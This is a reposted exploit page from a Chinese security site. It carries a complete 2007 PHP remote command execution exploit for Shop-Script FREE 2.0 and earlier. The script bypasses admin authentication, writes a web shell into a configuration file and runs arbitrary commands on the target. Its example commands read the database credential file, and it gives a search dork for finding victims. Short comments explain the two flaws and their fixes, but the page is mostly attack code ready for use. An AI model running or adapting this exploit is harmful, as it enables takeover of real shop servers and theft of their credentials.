首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Shop-Script FREE <= 2.0 Remote Command Execution Exploit 来源：InATeam 作者：Raz0r 发布时间：2007-09-18   <?php ## Shop-Script FREE <= 2.0 Remote Command Execution Exploit by InATeam ## tested on versions 1.2 and 2.0 ## works regardless magic_quotes_gpc=on ## Greetz: eXp, Kuzya, cxim, Russian, ENFIX echo "--------------------------------------------------------\n"; echo "Shop-Script FREE <= 2.0 Remote Command Execution Exploit\n"; echo "(c)oded by Raz0r, InATeam (InAttack.Ru)\n"; echo "dork: \"Powered by Shop-Script FREE\"\n"; echo "--------------------------------------------------------\n"; if ($argc<2) { echo "USAGE:\n"; echo "~~~~~~\n"; echo "php {$argv[0]} [url] [cmd]\n\n"; echo "[url] - target server where Shop-Script FREE is installed\n"; echo "[cmd] - command to execute\n\n"; echo "e.g. php {$argv[0]} http://site.com/shop/ \"ls -la\"\n"; echo "     php {$argv[0]} http://shop.site.com:8080/ \"cat cfg/connect.inc.php\"\n"; die; } /** * software site: http://shop-script.com/ * * i) admin authorization bypass * vulnerable code in admin.php near lines 37-41: * ------------------[source code]---------------------- * if (!isset($_SESSION["log"]) || !isset($_SESSION["pass"])) //unauthorized *   { *       //show authorization form *       header("Location: access_admin.php"); *   } * ------------------[/source code]--------------------- * unathorized user wiil be redirected to the page with the auth form but the script will continue running. * So, admin panel can be accessed by ignoring "Location" header. Solution: * ------------------[source code]---------------------- * if (!isset($_SESSION["log"]) || !isset($_SESSION["pass"])) //unauthorized *   { *       //show authorization form *       header("Location: access_admin.php"); *       die; *   } * ------------------[/source code]--------------------- * ii) arbitrary php code injection * vulnerable code in /includes/admin/sub/conf_appearence.php near lines 29-38: * ------------------[source code]---------------------- * $f = fopen("./cfg/appearence.inc.php","w"); * fputs($f,"<?php\n\tdefine('CONF_PRODUCTS_PER_PAGE', '".str_replace("'","\'",stripslashes($_POST["productscount"]))."');\n"); * fputs($f,"\tdefine('CONF_COLUMNS_PER_PAGE', '".str_replace("\\\"","\"",$_POST["colscount"])."');\n"); * ... * fputs($f,"\tdefine('CONF_LIGHT_COLOR', '".str_replace("\\\"","\"",$_POST["lightcolor"])."');\n?>"); * fclose($f); * ------------------[/source code]--------------------- * specially formed POST data will break the config file's structure. So, it is possible to inject * arbitrary php code in /cfg/appearence.inc.php. Solution: filtering backslash and single quote characters. */ error_reporting(0); set_time_limit(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",10); $url = $argv[1]; $cmd = $argv[2]; $url_parts = parse_url($url); $host = $url_parts['host']; $path = $url_parts['path']; if (isset($url_parts['port'])) $port = $url_parts['port']; else $port = 80; $packet ="GET {$path}admin.php?dpt=conf&sub=appearence HTTP/1.0\r\n"; $packet.="Host: {$host}\r\n"; $packet.="User-Agent: InAttack evil agent\r\n"; $packet.="Connection: close\r\n\r\n"; $resp = send($packet); echo "[~] Connecting to $host..."; $resp ? print(" OK\n") : die(" failed"); $inputnames=array("productscount","colscount","darkcolor","middlecolor","lightcolor","add2cart","bestchoice"); $matches=array(); foreach($inputnames as $input) {     if (preg_match('@<input type=text name='.$input.' value="([^"]*)">@',$resp,$matches)) $inputvalues[$input] = urlencode($matches[1]);     elseif (preg_match('@<input type=checkbox name='.$input.' checked>@',$resp,$matches)) $inputvalues[$input] = "on"; } if (!isset($inputvalues) || sizeof($inputvalues)==0) die("[-] Exploit failed"); echo "[~] Sending shellcode..."; $data = makedata(1); $packet = "POST {$path}admin.php HTTP/1.0\r\n"; $packet.= "Host: $host\r\n"; $packet.= "User-Agent: InAttack evil agent\r\n"; $packet.= "Content-Length: ".strlen($data)."\r\n"; $packet.= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet.= "Connection: keep-alive\r\n\r\n"; $packet.= $data; $resp = send($packet); $resp ? print(" OK\n") : die(" failed"); echo "[~] Executing command..."; $packet ="GET {$path}index.php?cmd=".urlencode($cmd)." HTTP/1.0\r\n"; $packet.="Host: {$host}\r\n"; $packet.="User-Agent: InAttack evil agent\r\n"; $packet.="Connection: close\r\n\r\n"; $resp = send($packet); $matches=array(); if (!preg_match('@InAttack(.*?)InAttack@s',$resp,$matches))echo("failed\n"); else (($result = $matches[1]) == 's4f3_m0d3') ? print(" failed\n[-] Safe_mode=On\n") : (($result == 'd1s4bl3d') ? print(" failed\n[-] system() is disabled\n") : printf(" OK\n%'-56s\n%s%'-56s\n",'',$result,'')); echo "[~] Restoring values..."; $data = makedata(); $packet = "POST {$path}admin.php HTTP/1.0\r\n"; $packet.= "Host: $host\r\n"; $packet.= "User-Agent: InAttack evil agent\r\n"; $packet.= "Content-Length: ".strlen($data)."\r\n"; $packet.= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet.= "Connection: keep-alive\r\n\r\n"; $packet.= $data; $resp = send($packet); $resp ? print(" OK\n") : die(" failed"); function send($packet) {     global $host,$port;     $ock = @fsockopen(@gethostbyname($host),$port);     if (!$ock) return false;     else {         fputs($ock, $packet);         $html='';         while (!feof($ock)) $html.=fgets($ock);     }     return $html; } function makedata($modifyvalues=0) {     global $inputvalues;     $shellcode = '\');if(!empty($_GET["cmd"])&&!defined("INA")){echo"InAttack";if(!ini_get("safe_mode")){if(strpos(ini_get("disable_functions"),"system")===false){$c=$_GET["cmd"];if(get_magic_quotes_gpc()){$c=stripslashes($c);}system($c);}else{echo"d1s4bl3d";}}else{echo"s4f3_m0d3";}echo"InAttack";define("INA",true);}//';     $data = "dpt=conf&";     $data.= "sub=appearence&";     $data.= "save_appearence=1&";     $data.= "productscount={$inputvalues['productscount']}";     if ($modifyvalues==1) $data.=urlencode("\\".$shellcode)."&"; else $data.="&";     $data.= "colscount={$inputvalues['colscount']}";     if ($modifyvalues==1) $data.=urlencode($shellcode)."&"; else $data.="&";     $data.= "darkcolor={$inputvalues['darkcolor']}";     if ($modifyvalues==1) $data.=urlencode("\\\\".$shellcode)."&"; else $data.="&";     $data.= "middlecolor={$inputvalues['middlecolor']}&";     $data.= "lightcolor={$inputvalues['lightcolor']}&";     $data.= "add2cart={$inputvalues['add2cart']}&";     $data.= "bestchoice={$inputvalues['bestchoice']}";     return $data; } ## EOF ?>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Omnistar Article Manager Softw ·MW6 Technologies QRCode Active ·KwsPHP 1.0 stats Module Remote ·Apple Quicktime /w IE .qtl Ver ·KwsPHP 1.0 Member_Space Module ·phpBB Mod Ktauber.com StylesDe ·KwsPHP 1.0 (login.php) Remote ·Airsensor M520 HTTPD Remote Pr ·Gelato (index.php post) Remote ·jetAudio 7.x ActiveX DownloadF ·SA-Blog Exp ·Yahoo! Messenger 8.1.0.421 CYF   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved